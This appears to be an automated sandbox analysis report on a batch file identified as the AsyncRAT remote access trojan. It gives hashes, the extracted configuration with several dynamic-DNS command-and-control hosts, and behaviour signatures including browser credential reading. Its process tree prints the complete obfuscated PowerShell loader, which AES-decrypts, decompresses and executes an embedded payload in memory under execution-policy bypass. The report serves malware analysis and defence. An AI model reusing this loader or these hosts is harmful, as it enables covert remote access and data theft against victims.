Analysis
- max time kernel: 48s
- max time network: 153s
- platform: windows10-1703_x64
- resource: win10-20220901-en
- resource tags: arch:x64, arch:x86, image:win10-20220901-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 01-02-2023 23:07
Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: test.bat, Resource: win10-20220901-en)
- Behavioral task: behavioral2 (Sample: test.bat, Resource: win7-20221111-en)
General
- Target: test.bat
- Size: 48KB
- MD5: 106c27af68b78b8670267a5eebfc8040
- SHA1: a2bbfb23b51cb1f2bb213dfe410601bc7fa53875
- SHA256: 037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c
- SHA512: 7de6b4f739f209c11cadee9360d5cb799b77bc5d4083b706a4d9bc21f501bb45e218715dbca6cd61811458b0efd190dba06dc04141650a48d91a305abf8e4600
- SSDEEP: 768:0oEB9ZEYgBM1D1gozT1RjnAKRc1pU9/gnEiCsfhh8pRA9buJsgsSxQ:jErqY7coz0JagnEtqh8pYbFgsSxQ
Malware Config
Extracted family: asyncrat
- version: 0.5.7B
- botnet: Default
- c2:
  mikludoykxx.ddns.net:6606
  mikludoykxx.ddns.net:7707
  mikludoykxx.ddns.net:8808
  mikeludomax.ddns.net:6606
  mikeludomax.ddns.net:7707
  mikeludomax.ddns.net:8808
  mikeludoyyxx.ddns.net:6606
  mikeludoyyxx.ddns.net:7707
  mikeludoyyxx.ddns.net:8808
- mutex: AsyncMutex_6SI8OkPnk
- delay: 3
- install: false
- install_folder: %AppData%
Signatures
- Async RAT payload (2 IoCs)
  resource: behavioral1/memory/4688-141-0x0000018FCA550000-0x0000018FCA562000-memory.dmp, yara rule: asyncrat
  resource: behavioral1/memory/4688-146-0x0000018FCB0B0000-0x0000018FCB0D2000-memory.dmp, yara rule: asyncrat
- Executes dropped EXE (1 IoC)
  pid 4688: test.bat.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid 4688: test.bat.exe (reported three times)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  pid 4688 test.bat.exe: Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (6 IoCs)
  PID 1660 cmd.exe wrote to memory of 4688 test.bat.exe (reported twice)
  PID 4688 test.bat.exe wrote to memory of 4964 cmd.exe (reported twice)
  PID 4964 cmd.exe wrote to memory of 2780 powershell.exe (reported twice)
Processes
1. C:\Windows\system32\cmd.exe
   command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\test.bat.exe
      command line: "test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $IDBqQ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($tScli in $IDBqQ) { if ($tScli.StartsWith(':: ')) { $NZVFu = $tScli.Substring(3); break; }; };$UPeLj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NZVFu);$OYivd = New-Object System.Security.Cryptography.AesManaged;$OYivd.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OYivd.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OYivd.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jIvbQQrMXVTkWeSQpp2Gn0UtOPOB2NCbMxKhJ10/nw=');$OYivd.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('krrHd9BxMDg+kQ5ve/eVnA==');$mtmak = $OYivd.CreateDecryptor();$UPeLj = $mtmak.TransformFinalBlock($UPeLj, 0, $UPeLj.Length);$mtmak.Dispose();$OYivd.Dispose();$Tiyba = New-Object System.IO.MemoryStream(, $UPeLj);$sbkvz = New-Object System.IO.MemoryStream;$CwlxS = New-Object System.IO.Compression.GZipStream($Tiyba, [IO.Compression.CompressionMode]::Decompress);$CwlxS.CopyTo($sbkvz);$CwlxS.Dispose();$Tiyba.Dispose();$sbkvz.Dispose();$UPeLj = $sbkvz.ToArray();$nxXvq = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($UPeLj);$ZqEhy = $nxXvq.EntryPoint;$ZqEhy.Invoke($null, (, [string[]] ('')))
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\cmd.exe
         command line: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\nmkgfi.bat"' & exit
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\nmkgfi.bat"'
Downloads
- C:\Users\Admin\AppData\Local\Temp\test.bat.exe
  Filesize: 435KB
  MD5: f7722b62b4014e0c50adfa9d60cafa1c
  SHA1: f31c17e0453f27be85730e316840f11522ddec3e
  SHA256: ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
  SHA512: 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4